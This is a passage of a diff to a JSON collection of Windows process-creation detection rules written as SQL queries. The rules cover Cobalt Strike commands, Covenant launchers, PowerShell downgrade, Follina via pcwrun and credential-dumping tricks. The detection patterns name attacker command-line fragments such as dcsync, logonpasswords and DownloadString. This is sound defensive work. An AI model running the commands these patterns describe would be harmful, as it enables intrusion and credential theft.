Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.defense_evasion", - 
"attack.t1574.002", - "attack.g0044" - ], + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "status": "test", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. 
Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process 
spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian 
Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ "attack.execution", - "attack.t1059.003" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE 
'%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle 
Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects use of Cobalt Strike 
commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (SubjectLogonId = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - 
"title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Start Windows Service Via Net.EXE", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user executes a service for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_net_start_service.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron 
Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001", + "attack.t1564.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "author": "frack113", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. 
